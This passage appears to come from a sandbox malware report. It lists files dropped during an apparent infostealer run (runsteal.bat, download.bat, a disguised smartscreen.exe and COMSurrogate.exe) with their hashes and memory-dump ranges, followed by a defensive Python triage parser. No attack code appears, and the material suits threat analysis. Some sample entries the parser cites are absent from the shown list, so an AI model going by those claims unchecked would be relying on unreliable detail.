SHA512 bb921a6762cc914c5e257a660d2f24600e4b24fcddf6b42851e25cea6e9c00ec970fa6bd5f0f0651c0b2601bedfcefb5ad1c8bbfe8d6ffcfd43d11f1f67d04f6

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4ws2kncw.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl

MD5 96c542dec016d9ec1ecc4dddfcbaac66
SHA1 6199f7648bb744efa58acf7b96fee85d938389e4
SHA256 7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798
SHA512 cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658

memory/6684-1227-0x00000000008E0000-0x0000000000B88000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4ws2kncw.default-release\prefs-1.js

MD5 a42d38da8ba7c3fcc98a958fd9352148
SHA1 a9d785a215120ed13d294d9de048120d2339b4fc
SHA256 296039ffd03de53a819bc50221b30f4c4acab160928665ef183f7d79e99ff016
SHA512 612d12aaeea220a07746d941c0639c3d6f96af597810ccd85dbc383645efcce5773a1c441ac50173240f729df9543b7517ea780f369db1a975dd036fdbe1a1e6

memory/3548-1290-0x0000000000D00000-0x0000000001104000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe

MD5 0d5df43af2916f47d00c1573797c1a13
SHA1 230ab5559e806574d26b4c20847c368ed55483b0
SHA256 c066aee7aa3aa83f763ebc5541daa266ed6c648fbffcde0d836a13b221bb2adc
SHA512 f96cf9e1890746b12daf839a6d0f16f062b72c1b8a40439f96583f242980f10f867720232a6fa0f7d4d7ac0a7a6143981a5a130d6417ea98b181447134c7cfe2

memory/3548-1293-0x0000000003170000-0x000000000317E000-memory.dmp

memory/3548-1294-0x0000000005580000-0x00000000055DC000-memory.dmp

memory/3548-1295-0x0000000005ED0000-0x0000000006474000-memory.dmp

memory/3548-1296-0x0000000005920000-0x00000000059B2000-memory.dmp

memory/1888-1297-0x0000000000400000-0x00000000006DF000-memory.dmp

memory/3548-1299-0x0000000005850000-0x0000000005862000-memory.dmp

memory/3548-1300-0x0000000005E00000-0x0000000005E08000-memory.dmp

memory/3548-1301-0x0000000005E20000-0x0000000005E28000-memory.dmp

memory/3548-1302-0x0000000005E30000-0x0000000005E38000-memory.dmp

memory/3548-1303-0x0000000005E40000-0x0000000005E58000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1012579001\4fe69191d8.exe

MD5 623d073b8d01e00cbb5294ff07fe238a
SHA1 c3aeeb4de6cd38209944e7a1c3ecaa3f411f8775
SHA256 ce50862f51244b9dce6dbde2bc96fa852cff8ca84b720797894a3f43f4e293ca
SHA512 dc1fe9e39173bfd1e2722125b1385cf8c15e2570b65c1d5acb320a70d073d39a1a25f3665a87ccb3b8a0aaf7b7e63edb21e8e3cd4c3ac27e9cda237b54979824

memory/3548-1320-0x00000000065D0000-0x00000000065E0000-memory.dmp

memory/3548-1319-0x0000000006BB0000-0x00000000071D8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0lz22qiw.mdy.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3548-1333-0x0000000007220000-0x000000000723A000-memory.dmp

memory/5732-1334-0x0000000000400000-0x0000000000C62000-memory.dmp

memory/3548-1335-0x0000000007280000-0x00000000072B6000-memory.dmp

memory/3548-1336-0x0000000007940000-0x0000000007FBA000-memory.dmp

memory/3548-1337-0x00000000074A0000-0x0000000007536000-memory.dmp

memory/3548-1338-0x00000000076B0000-0x00000000076D2000-memory.dmp

memory/3548-1340-0x00000000076E0000-0x00000000076FE000-memory.dmp

memory/3548-1341-0x00000000077C0000-0x000000000780A000-memory.dmp

memory/3548-1339-0x0000000007750000-0x00000000077B6000-memory.dmp

memory/3548-1348-0x00000000084D0000-0x0000000008536000-memory.dmp

memory/3548-1347-0x00000000080C0000-0x0000000008414000-memory.dmp

memory/3548-1349-0x0000000008570000-0x0000000008592000-memory.dmp

memory/3548-1351-0x0000000008810000-0x000000000885C000-memory.dmp

memory/3548-1366-0x0000000009BD0000-0x0000000009BEE000-memory.dmp

memory/3548-1367-0x0000000009C70000-0x0000000009D13000-memory.dmp

memory/3548-1368-0x0000000009C30000-0x0000000009C3A000-memory.dmp

memory/3548-1369-0x0000000009D20000-0x0000000009D31000-memory.dmp

memory/3548-1370-0x0000000009D40000-0x0000000009D4E000-memory.dmp

memory/3548-1371-0x000000000A010000-0x000000000A024000-memory.dmp

memory/3548-1372-0x000000000A050000-0x000000000A06A000-memory.dmp

memory/3548-1373-0x000000000A070000-0x000000000A078000-memory.dmp

memory/3548-1374-0x00000000088F0000-0x00000000088FA000-memory.dmp

memory/3548-1376-0x000000000A040000-0x000000000A658000-memory.dmp

memory/3548-1377-0x0000000008D30000-0x0000000008D42000-memory.dmp

memory/3548-1378-0x0000000008D90000-0x0000000008DCC000-memory.dmp

memory/3548-1379-0x0000000008F00000-0x000000000900A000-memory.dmp

memory/3548-1380-0x00000000091E0000-0x00000000093A2000-memory.dmp

memory/6684-1381-0x00000000008E0000-0x0000000000B88000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\download.bat

MD5 f2a75175c8082ccd3e1713b00556a6e2
SHA1 2f5dc37978320bc1ca207c0c0aff1240aad6c7cf
SHA256 019157c15709f7d6301cb0fb15f45c054230ea91f06ff817b426d7f6ccb14686
SHA512 011ab44e81d61636d5b1637584faf0701a5b2226289b6200cd89ad97927f52f1c659df626afc2b46edd656960d67934fff97f5e10fd6a7454027d430feafa7a9

memory/2564-1401-0x0000000000D60000-0x0000000001202000-memory.dmp

memory/6684-1407-0x00000000008E0000-0x0000000000B88000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\smartscreen.exe

MD5 1fed66d1f6b85bda20fe0403ca01c9bd
SHA1 6a3056191a7d8da167285b2bf5f9fa671022c8c1
SHA256 924ee12f6a98aeeb1c7836ec8984f0f93216bfff0433bcd4ee643d33d96db74a
SHA512 0fb1397078689a52d1c77cc239b1e42afa5ff87a3f5b4f825705e9bda1bd2c58bfb50a6067ea0a202fa7edb0a890cbac9314413fc8757c8b75a43fa0b12ef613

memory/6616-1422-0x0000022283A50000-0x0000022283A7E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\runsteal.bat

MD5 744f8978db36b4b9db7cb6e5c8c41e08
SHA1 84321921f622d20a4d40c9bef43b7744e74aaee7
SHA256 cedfe277f8c600679365ce2c54a9c303907a0acadc23ed6e6968746d2e8ca468
SHA512 d1584b2134bf3960af33a514b3a9fba69c7eb2fbbc3b0cffe7e493f182b20547f7596012fcc5e6b5ffbefee5a0b7d1afe45eee822cff5b0720ffd6292af2394f

memory/6456-1427-0x0000000007B00000-0x0000000007B32000-memory.dmp

memory/6456-1438-0x0000000007B40000-0x0000000007BE3000-memory.dmp

memory/6456-1428-0x000000006EB90000-0x000000006EBDC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\checkmiexe.bat

MD5 d1fdfad5ce7134b1ef5a54cf37001031
SHA1 82e0f4e953b3aeaca622ec071639baf6ae17aadb
SHA256 54f8474d983dc3dd78e3d3289076152651e2f8cc5f30ae3f2740ba15e71cc6a6
SHA512 b6b7b4f134a6b436cd32e39fb645d91acc12482d352158a755359d0f6cbb8fd5bab9351081916b0b638e3ff2bde4b6ac2f6202f3ca58f1146f39defc039e88e7

memory/6456-1449-0x0000000007E70000-0x0000000007E81000-memory.dmp

memory/6456-1459-0x0000000007EB0000-0x0000000007EC4000-memory.dmp

memory/1888-1460-0x0000000000400000-0x00000000006DF000-memory.dmp

memory/1888-1464-0x00000000009E0000-0x0000000000A81000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 968cb9309758126772781b83adb8a28f
SHA1 8da30e71accf186b2ba11da1797cf67f8f78b47c
SHA256 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA512 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3cbbd23e401cd6493403e366be8e2a08
SHA1 307c905805d256a0031957c6d8012dfe1f29270e
SHA256 699a78b4f2dd345e186823206efeefa12ab2a85e9a760e44738138ac451292d6
SHA512 d7f4ad629667e41823625a11c8da88eb4ad54bd2c2935fc38c94ab4a3e7535da4dec4423c966a300141f1faeb1e1c5ee7d901d92f35e18c9b029fbc3486b2fd4

memory/5188-1477-0x000000006EB90000-0x000000006EBDC000-memory.dmp

memory/5188-1487-0x0000000007090000-0x0000000007133000-memory.dmp

memory/5732-1489-0x0000000000400000-0x0000000000C62000-memory.dmp

memory/5732-1488-0x0000000000400000-0x0000000000C62000-memory.dmp

memory/5188-1490-0x00000000073D0000-0x00000000073E1000-memory.dmp

memory/5188-1492-0x0000000007420000-0x0000000007434000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\downloaded_script.bat

MD5 da7552eed00789bd53f831e67cf54f8d
SHA1 653b2ec2b0975ab4b11f1c35a10e307c95450f17
SHA256 5cb4de27952514f557cf52a3a90b68f7c62a512732e799c766a85c4f7905f38f
SHA512 f618164b414a91ccb3569b85fad155fbb55defc55dfc5e2a48ee59f25307182ab2e3d9f8dddffc950cd6397442a876922608c0bbcc447ec0fc56f12446418bfc

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 29cf49326e382aae24d776fa6062c0ee
SHA1 054ebe60b02f74750903cfcd153f6ab2c5f2ea4b
SHA256 f0de72f3dc555387b027f88ec3a26548c2385861feb9ec6d4b578f3fd2581701
SHA512 97e021e28184456eafb5d293db92dead0d711afb9038635dc0b74cafa3065dbf8959c5af9e63090f548cdd67d89c93edaea0f1693281a5b26405c1c2ede46f84

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 9ef735b02779a95afb4db09fd4d32359
SHA1 625aad54e9ab3964cc09d0bfa6e9dc7379607717
SHA256 0a577e3d8bf1ff31ac2efda84f5d3b98ad0f593590568054654a3cc0d423152a
SHA512 5e1830f24bc94ccbdf4f0cf5489efb2147bd5a101214054e67dde075867e648555ac2953b850f58f7bf3fdbbbd9d3edd8e74ec657a6ba2488740df00dd56a3df

C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe (zero-byte file when captured: the digests below are those of empty input)

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 b5832bacf67fc3dfce849295c432f6e8
SHA1 a97230f90c5b0541f94d531d1dd622106a284d55
SHA256 2335070b5dd1c40ed4490a3beb45c17c60e748cac50398d457abe2c64104fc11
SHA512 a89ef305ed068ee9a11c3292ae89e6938dabc7baf02006457956ffa3437b41ed90f7ad14a27d2023de7b6181375b832383e2cb31e1128c0bbf1c7c3ae864bae3

memory/6300-1562-0x00000164020A0000-0x00000164020CE000-memory.dmp

memory/4524-1563-0x000000006EB90000-0x000000006EBDC000-memory.dmp

memory/6604-1577-0x0000000000D60000-0x0000000001202000-memory.dmp

memory/4524-1578-0x0000000007EB0000-0x0000000007EC2000-memory.dmp

memory/4524-1579-0x0000000007EA0000-0x0000000007EAA000-memory.dmp

memory/6604-1582-0x0000000000D60000-0x0000000001202000-memory.dmp

memory/2564-1584-0x0000000000D60000-0x0000000001202000-memory.dmp

memory/1888-1592-0x0000000000400000-0x00000000006DF000-memory.dmp

memory/5732-1596-0x0000000000400000-0x0000000000C62000-memory.dmp

memory/2564-1628-0x0000000000D60000-0x0000000001202000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmpaddon

MD5 09372174e83dbbf696ee732fd2e875bb
SHA1 ba360186ba650a769f9303f48b7200fb5eaccee1
SHA256 c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f
SHA512 b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4ws2kncw.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info

MD5 2a461e9eb87fd1955cea740a3444ee7a
SHA1 b10755914c713f5a4677494dbe8a686ed458c3c5
SHA256 4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc
SHA512 34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4ws2kncw.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll

MD5 842039753bf41fa5e11b3a1383061a87
SHA1 3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153
SHA256 d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c
SHA512 d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4ws2kncw.default-release\prefs-1.js

MD5 465bbf30db2ad07075705f63ff9a3ba5
SHA1 84bb4b8003638a789c8e407ddb7c01f280b4c43c
SHA256 f91e087a73d66b874674b248bcf22076dbecd84273e887ac9986e5aa59316c7b
SHA512 0dab4c0b560a35e81fefa7e89a823c1269b6f260fc53d53c2cce9a4ff2067d78df11dd36fc1d073b7683c6f8648f3522954cc5564aa448cd63ac967016372c20

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4ws2kncw.default-release\AlternateServices.bin

MD5 749a21318675d2f04cdbbb3b59820242
SHA1 bfc4f9a149c3d30c1eecf5d76ae8f75d9f235916
SHA256 56cef1f09308430fb66cddbba0bcd5a43b72fbe5ad258e9ee00f4a0bfc3f3ab9
SHA512 d3c647380e7db943a14afe5738c11e740995b132525eeb5c75aab10aae1d7915312e80582c6c6d0f4e094f8ee73360cc6e1a6ff3d453c7a437cb0870c391e4b8

C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

MD5 0a8747a2ac9ac08ae9508f36c6d75692
SHA1 b287a96fd6cc12433adb42193dfe06111c38eaf0
SHA256 32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03
SHA512 59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4ws2kncw.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll

MD5 daf7ef3acccab478aaa7d6dc1c60f865
SHA1 f8246162b97ce4a945feced27b6ea114366ff2ad
SHA256 bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e
SHA512 5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4ws2kncw.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json

MD5 bf957ad58b55f64219ab3f793e374316
SHA1 a11adc9d7f2c28e04d9b35e23b7616d0527118a1
SHA256 bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda
SHA512 79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e

memory/1888-1686-0x0000000000400000-0x00000000006DF000-memory.dmp

memory/5732-1692-0x0000000000400000-0x0000000000C62000-memory.dmp

memory/2564-1705-0x0000000000D60000-0x0000000001202000-memory.dmp

memory/1888-1709-0x0000000000400000-0x00000000006DF000-memory.dmp

memory/940-1753-0x0000000000D60000-0x0000000001202000-memory.dmp

memory/940-1755-0x0000000000D60000-0x0000000001202000-memory.dmp
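Before pivoting on the digests in the list above, three checks pay off: which entries are dropped files versus memory-region dumps, which paths appear more than once with different hashes (rewritten during the run, as StartupProfileData-NonInteractive and data.safe.tmp are), and whether an entry carries the digests of a zero-byte file (as COMSurrogate.exe does). The parser below is an added example, not part of the report; SAMPLE is a subset of entries copied from the list, and the empty-input digests are recomputed with hashlib rather than trusted from memory.

```python
"""Parse the sandbox 'Files' list into records and run the checks an analyst
wants before using the hashes as indicators."""
import hashlib
import re
from collections import defaultdict
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Constructed sample: a subset of entries copied from the report's Files list.
SAMPLE = r"""
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\T5v89.exe

MD5 08b1c924756ba9d72d0a3920d9b6378e
SHA1 7fc26d76ef9928fb3ef08223bbcecd0b53d0e43d
SHA256 e599f6a0e9fd997d4a4c027a36fe1125c8280925692889ad5be8e24206992a53
SHA512 df3cf9e9034fa7d69f7db6ebd43e378dc4e084c1df8242ac7fa710bd1181bdca042fe044b0903e9ccaeb61e5420ac7f349ab88a858aba889ac300678e5c6363b

memory/1848-14-0x0000000000380000-0x0000000000822000-memory.dmp

memory/2564-30-0x0000000000D60000-0x0000000001202000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3cbbd23e401cd6493403e366be8e2a08
SHA1 307c905805d256a0031957c6d8012dfe1f29270e
SHA256 699a78b4f2dd345e186823206efeefa12ab2a85e9a760e44738138ac451292d6
SHA512 d7f4ad629667e41823625a11c8da88eb4ad54bd2c2935fc38c94ab4a3e7535da4dec4423c966a300141f1faeb1e1c5ee7d901d92f35e18c9b029fbc3486b2fd4

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 29cf49326e382aae24d776fa6062c0ee
SHA1 054ebe60b02f74750903cfcd153f6ab2c5f2ea4b
SHA256 f0de72f3dc555387b027f88ec3a26548c2385861feb9ec6d4b578f3fd2581701
SHA512 97e021e28184456eafb5d293db92dead0d711afb9038635dc0b74cafa3065dbf8959c5af9e63090f548cdd67d89c93edaea0f1693281a5b26405c1c2ede46f84

C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
"""

DIGEST_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
HASH_LINE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+([0-9a-fA-F]+)$")
# memory/<pid>-<seq>-0x<start>-0x<end>-memory.dmp
DUMP_LINE = re.compile(r"^memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$")
# Digests of zero-byte input, computed here rather than hard-coded.
EMPTY = {alg: getattr(hashlib, alg.lower())(b"").hexdigest() for alg in DIGEST_LEN}


@dataclass
class FileRecord:
    path: str
    digests: Dict[str, str] = field(default_factory=dict)


@dataclass(frozen=True)
class MemDump:
    pid: int
    seq: int
    start: int
    end: int

    @property
    def size(self) -> int:
        return self.end - self.start


def parse_files(text: str) -> Tuple[List[FileRecord], List[MemDump]]:
    files, dumps = [], []
    current: Optional[FileRecord] = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if m := DUMP_LINE.match(line):
            dumps.append(MemDump(int(m[1]), int(m[2]), int(m[3], 16), int(m[4], 16)))
            current = None
            continue
        if m := HASH_LINE.match(line):
            if current is None:
                raise ValueError(f"digest without a preceding path: {line!r}")
            alg, hexd = m[1], m[2].lower()
            if len(hexd) != DIGEST_LEN[alg]:   # catches truncated copy-paste
                raise ValueError(f"{alg} digest has wrong length for {current.path}")
            current.digests[alg] = hexd
            continue
        current = FileRecord(path=line)      # anything else starts a new file entry
        files.append(current)
    return files, dumps


def empty_files(files: List[FileRecord]) -> List[str]:
    """Paths whose recorded digests are those of a zero-byte file."""
    return [f.path for f in files
            if f.digests and all(f.digests[a] == EMPTY[a] for a in f.digests)]


def rewritten_paths(files: List[FileRecord]) -> Dict[str, List[Optional[str]]]:
    """Same path listed more than once with differing SHA256."""
    seen = defaultdict(list)
    for f in files:
        seen[f.path].append(f.digests.get("SHA256"))
    return {p: hs for p, hs in seen.items() if len(set(hs)) > 1}


def dump_sizes_by_pid(dumps: List[MemDump]) -> Dict[int, List[int]]:
    out = defaultdict(list)
    for d in dumps:
        out[d.pid].append(d.size)
    return dict(out)


def verify_bytes(data: bytes, rec: FileRecord) -> bool:
    """Recompute every recorded digest over data; all of them must match."""
    return bool(rec.digests) and all(
        getattr(hashlib, alg.lower())(data).hexdigest() == hexd
        for alg, hexd in rec.digests.items())


if __name__ == "__main__":
    files, dumps = parse_files(SAMPLE)
    print("empty:", empty_files(files))
    print("rewritten:", list(rewritten_paths(files)))
    print("dump sizes:", dump_sizes_by_pid(dumps))
```

Run on the rows above it flags COMSurrogate.exe as empty, reports StartupProfileData-NonInteractive as rewritten, and shows that the regions dumped from PIDs 1848 and 2564 are the same size (0x4A2000 bytes), which is a cue to compare the two dumps before treating them as different payloads.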